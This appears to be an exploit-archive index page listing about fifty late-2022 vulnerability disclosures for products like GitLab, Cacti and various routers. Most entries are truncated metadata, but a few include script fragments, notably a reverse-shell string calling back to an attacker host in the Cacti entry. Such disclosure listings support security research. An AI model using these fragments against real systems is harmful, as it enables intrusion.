GitLab v15.3 - Remote Code Execution (Authenticated) Exploit

Exploit Title: GitLab v15.3 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Francesco Sardella Vendor Homepage: https://about.gitlab.com/ Software Link: https://about.gitlab.com/install/ Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to...

XCMS v1.83 - Remote Command Execution Exploit

Exploit Title: XCMS v1.83 - Remote Command Execution RCE Author: Onurcan Email: email protected Site: ihteam.net Script Download : http://www.xcms.it Date: 26/12/2022 The xcms's footerthat is in "/dati/generali/footer.dtb" is included in each page of the xcms. Taking "home.php" for example: So th...

AimOne Video Converter V2.04 Build 103 - Buffer Overflow Exploit

Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow DoS Author: nu11secur1ty Vendor: https://aimone-video-converter.software.informer.com/, http://www.aimonesoft.com/ Software: https://aimone-video-converter.software.informer.com/download/?ca85d0 Reference: Description: The AimOne Vid...

Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected XSS Vulnerabilities

Exploit Title: Yahoo User Interface library YUI2 TreeView v2.8.2 - Multiple Reflected Cross Site Scripting XSS Exploit Author: Rian Saaty Vendor Homepage: https://yui.github.io/yui2/ Software Link: https://yui.github.io/yui2/ Version: 2.8.2 Tested on: MacOS, WindowsOS, LinuxOS CVE : CVE-2022-4819...

Reprise Software RLM v14.2BL4 - Cross-Site Scripting Vulnerability

Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting XSS Exploit Author: Mohammed A.Siledar Author Company : reprisesoftware Version: rlm.v14.2BL4 Vendor home page : https://reprisesoftware.com Software Link:...

Prizm Content Connect v10.5.1030.8315 - XXE Vulnerability

Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE Exploit Author: @xhzeem Vendor Homepage: https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html Version: v10.5.1030.8315 The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE Proof Of Concept:...

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution Vulnerability

Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution RCE + Centos Web Panel 7 - 0.9.8.1147 + Affected Component ip:2031/login/index.php?login=$whoami + Discoverer: Numan Türle @ Gais Cyber Security + Author: Numan Türle + Vendor: https://centos-webpanel.com/ -...

AD Manager Plus 7122 - Remote Code Execution Vulnerability

Exploit Title: AD Manager Plus 7122 - Remote Code Execution RCE Exploit Author: Chan Nyein Wai & Thura Moe Myint Vendor Homepage: https://www.manageengine.com/products/ad-manager/ Software Link: https://www.manageengine.com/products/ad-manager/download.html Version: Ad Manager Plus Before 7122...

perfSONAR v4.4.5 - Partial Blind CSRF Vulnerability

Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF Link: https://github.com/perfsonar/ Affected Versions: v4.x = v4.4.5 Vulnerability Type: Partial Blind CSRF Discovered by: Ryan Moore CVE: CVE-2022-41413 Summary A partial blind CSRF vulnerability exists in perfSONAR v4.x = v4.4.5 within the...

Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio= n RCE Authenticated Exploit Author: Yerodin Richards Vendor Homepage: https://www.nexxtsolutions.com/ Version: 42.103.1.5095 Tested on: ARN02304U8 CVE : CVE-2022-44149 import requests import base64 routerhost =3D...

Enlightenment v0.25.3 - Privilege escalation Vulnerability

Exploit Title: Enlightenment v0.25.3 - Privilege escalation Author: nu11secur1ty Vendor: https://www.enlightenment.org/ Software: https://www.enlightenment.org/download Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706 CVE ID: CVE-2022-37706 Description: The...

Apache 2.4.x - Buffer Overflow Exploit

Exploit Title: Apache 2.4.x - Buffer Overflow Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS Monterey CVE :...

NetIQ Performance Endpoint v5.1 - remote root/SYSTEM Exploit

/ Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit Date: Jun 2007 Exploit Author: mu-b Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management Version: All Tested on: Windows / Solaris x86/SPARC CVE : 0day endpoint-pown-uni.c...

TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (Authenticated) Exploit

!/usr/bin/python3 Exploit Title: TP-Link TL-WR902AC firmware 210730 V3 - Remote Code Execution RCE Authenticated Exploit Author: Tobias Müller Date: 2022-12-01 Version: TL-WR902ACEUV30.9.1 Build 220329 Vendor Homepage: https://www.tp-link.com/ Tested On: TP-Link TL-WR902AC Vulnerability...

Splashtop 8.71.12001.0 - Unquoted Service Path Vulnerability

Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path Exploit Author: A.I. hernandez Version: 8.71.12001.0 Vendor Homepage: https://www.splashtop.com Version: current version Tested on: Windows 10 21H2 Step to discover Unquoted Service Path: C:\wmic service get...

GeoVision Camera GV-ADR2701 - Authentication Bypass Vulnerability

Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass Device name: GV-ADR2701 Exploit Author: Chan Nyein Wai Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Firmware Version: V1.0020171215 Tested on: windows 10 Exploitation...

WooCommerce v7.1.0 - Remote Code Execution Vulnerability

Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code ExecutionRCE Author: Milad Karimi Vendor Homepage: https://wordpress.org/plugins/woocommerce Software Link: https://wordpress.org/plugins/woocommerce Tested on: windows 10 , firefox Version: 7.1.0 CVE : N/A Description: simple, easy to use...

EQ Enterprise management system v2.2.0 - SQL Injection Vulnerability

Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection Exploit Author: TLF Vendor Homepage: https://www.yiquantech.com/pc/about.html Software Link漏洞影响应用下载链接:...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution RCE Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit

Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE: CVE-2022-46770 PoC exploi...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service DoS Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

Bludit 3-14-1 Plugin (UploadPlugin) - Remote Code Execution (Authenticated) Vulnerability

Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.bludit.com/ Version : 3-14-1 Tested on: windows 11 wampserver | Kali linux Category: WebApp Google Dork: intext:'2022...

ASKEY RTF3505VW-N1 - Privilege Escalation Exploit

Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation Exploit Author: Leonardo Nicolas Servalli Vendor Homepage: www.askey.com Platform: ASKEY router devices RTF3505VW-N1 Tested on: Firmware BRSVg000R3505VMN1001s327 Vulnerability analysis:...

Bangresto 1.0 - SQL Injection Vulnerability

Exploit Title: Bangresto 1.0 - SQL Injection Exploit Author: nu11secur1ty Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html Demo: https://axcora.my.id/bangrestoapp/start.php Software: https://github.com/mesinkasir/bangresto Reference:...

Textpattern 4.8.8 - Remote Code Execution (Authenticated) Vulnerability

Exploit Title: Textpattern 4.8.8 - Remote Code Execution RCE Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://textpattern.com/ Version : 4.8.8 Tested on: windows 11 xammp | Kali linux Category: WebApp Google Dork: intext:"Published with Textpattern...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versi...

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

rconfig 3.9.7 - Sql Injection (Authenticated) Exploit

Exploit Title: rconfig 3.9.7 - Sql Injection Authenticated Exploit Author: azhen Vendor Homepage: https://www.rconfig.com/ Software Link: https://www.rconfig.com/ Vendor: rConfig Version: " sys.exit1 host=sys.argv1 Enter the hostname def getdatahost: print"+ Get db data..." vulurl =...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First...

SOUND4 Server Service 4.1.102 - Local Privilege Escalation Vulnerability

Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 4.1.102 Summary: SOUND4 Windows Server Service. Desc: The application suffers from an unquot...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass IDOR Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Versio...

SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass Vulnerability

Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First Version 2: 1.1/2.15 Impact/Pulse/First Version 1:...

Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

CoolerMaster MasterPlus 1.8.5 - (MPService) Unquoted Service Path Vulnerability

Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path Exploit Author: Damian Semon Jr Blue Team Alpha Version: 1.8.5 Vendor Homepage: https://masterplus.coolermaster.com/ Software Link: https://masterplus.coolermaster.com/ Tested on: Windows 10 64x Step to discover the...

Judging Management System v1.0 - Authentication Bypass Vulnerability

Exploit Title: Judging Management System v1.0 - Authentication Bypass Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0 Teste...

LISTSERV 17 - Reflected Cross Site Scripting Vulnerability

Exploit Title: LISTSERV 17 - Reflected Cross Site Scripting XSS Google Dork: inurl:/scripts/wa.exe Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CVE : CVE-2022-3919...

Concrete5 CME v9.1.3 - Xpath injection Vulnerability

Exploit Title: Concrete5 CME v9.1.3 - Xpath injection Author: nu11secur1ty Vendor: https://www.concretecms.org/ Software: https://www.concretecms.org/download Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 Description: The URL...

Ancillary Function Driver (AFD) For Winsock Privilege Escalation Exploit

A vulnerability exists in the Windows Ancillary Function Driver for Winsock afd.sys can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. Due to a flaw in AfdNotifyRemoveIoCompletion, it is possible to create an arbitrary kernel Write-Where primitive, which can b...

Lavasoft web companion 4.1.0.409 - (DCIservice) Unquoted Service Path Vulnerability

Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Author: P4p4 M4n3 Vendor Homepage: https://webcompanion.com/en/ Version 4.1.0.409 Tested on: Microsoft Windows Server 2019 Datacenter x64 Description: Lavasoft 4.1.0.409 install DCIservice as a service with an...

Ecommerse v1.0 - Cross-Site Scripting (XSS) Vulnerability

Title: Ecommerse v1.0 - Cross-Site Scripting XSS Author: nu11secur1ty Vendor: https://github.com/winston-dsouza Software: https://github.com/winston-dsouza/ecommerce-website Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website Description:...

4images 1.9 - Remote Command Execution Vulnerability

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

ZTE-H108NS Router - Authentication Bypass Vulnerability

Exploit Title: Router ZTE-H108NS - Authentication Bypass Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 CVE: N/A Tested on: Debian 5.18.5 Description : When specific http methods are listed within a security constraint, then only those...

Eve-ng 5.0.1-13 - Stored Cross-Site Scripting Vulnerability

Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting XSS Exploit Author: @casp3r0x0 hassan ali al-khafaji Vendor Homepage: https://www.eve-ng.net/ Software Link: https://www.eve-ng.net/index.php/download/ Version: Free EVE Community Edition Version 5.0.1-13 Tested on: Free EVE Community...

ZTE-H108NS Router - Stack Buffer Overflow Exploit

Exploit Title: ZTE-H108NS - Stack Buffer Overflow DoS Exploit Author: George Tsimpidas Vendor: https://www.zte.com.cn/global/ Firmware: H108NSV1.0.7uZRDGR2A68 Usage: python zte-exploit.py CVE: N/A Tested on: Debian 5.18.5 !/usr/bin/python3 import sys import socket from time import sleep host =...

CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Vulnerability

Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi Deda Cloud Cybersecurity Team Vendor Homepage: https://www.crowdstrike.com/ Author Homepage:...

Zillya Total Security 3.0.2367.0 - Local Privilege Escalation Vulnerability

Exploit Title: Zillya Total Security 3.0.2367.0 - Local Privilege Escalation Author: M. Akil Gündoğan Contact: https://twitter.com/akilgundogan Vendor Homepage: https://zillya.com/ Software Link: https://download.zillya.com/ZTS3.exe / https://download.zillya.com/ZIS3.exe Version: IS 3.0.2367.0 / ...

Dreamer CMS v4.0.0 - SQL Injection Vulnerability

Exploit Title: Dreamer CMS v4.0.0 - SQL Injection Exploit Author: lvren Vendor Homepage: http://cms.iteachyou.cc/ Software Link: https://gitee.com/isoftforce/dreamercms/repository/archive/v4.0.0.zip Version: v4.0.0 CVE: CVE-2022-43128 Proof Of Concept: POST /admin/search/doSearch HTTP/1.1 Host:...

LISTSERV 17 - Insecure Direct Object Reference (IDOR) Vulnerability

Exploit Title: LISTSERV 17 - Insecure Direct Object Reference IDOR Google Dork: inurl:/scripts/wa.exe Exploit Author: Shaunt Der-Grigorian Vendor Homepage: https://www.lsoft.com/ Software Link: https://www.lsoft.com/download/listserv.asp Version: 17 Tested on: Windows Server 2019 CVE :...

Shoplazza 1.1 - Stored Cross-Site Scripting Vulnerability

Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting XSS Exploit Author: Andrey Stoykov Software Link: https://github.com/Shoplazza/LifeStyle Version: 1.1 Tested on: Ubuntu 20.04 Stored XSS 1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" - "Manage...